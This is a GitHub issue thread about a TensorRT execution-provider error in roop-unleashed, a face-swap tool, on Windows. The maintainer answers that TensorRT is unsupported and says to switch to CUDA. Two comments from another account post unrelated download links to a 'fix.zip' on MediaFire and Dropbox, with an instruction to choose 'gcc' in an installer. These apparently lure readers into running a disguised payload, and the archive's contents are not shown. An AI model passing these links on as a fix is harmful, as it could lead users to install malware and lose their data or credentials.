### ISSUE TITLE
Error generating video

### ISSUE THREAD

**Issue by javierlechuXD** [C0untFloyd/roop-unleashed#864]
**Describe the bug**
Error generating video

**Details**
What OS are you using?
- [ ] Linux
- [ ] Linux in WSL
- [x] Windows 
- [ ] Mac

Are you using a GPU?
- [ ] No. CPU FTW
- [x] NVIDIA RTX 4080
- [ ] AMD
- [ ] Intel
- [ ] Mac

4.1.1

**Screenshots**
![image](https://github.com/user-attachments/assets/b75bbb63-7f58-490b-81b9-aefd8a934884)
![image](https://github.com/user-attachments/assets/076a0e63-3fef-4724-bab7-f8e03eb2b980)

 `*************** EP Error ***************
EP Error D:\a\_work\1\s\onnxruntime\python\onnxruntime_pybind_state.cc:456 onnxruntime::python::RegisterTensorRTPluginsAsCustomOps Please install TensorRT libraries as mentioned in the GPU requirements page, make sure they're in the PATH or LD_LIBRARY_PATH, and that your GPU is supported.
when using ['TensorrtExecutionProvider']
 Falling back to ['CPUExecutionProvider'] and retrying.
 ****************************************`

**Comment by javierlechuXD** [comment]
![image](https://github.com/user-attachments/assets/37200573-c164-4c5a-94dc-f8d071ec88fa)

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by C0untFloyd** [comment]
TensorRT is currently much too slow and therefore not supported. Set it to 'cuda' instead.
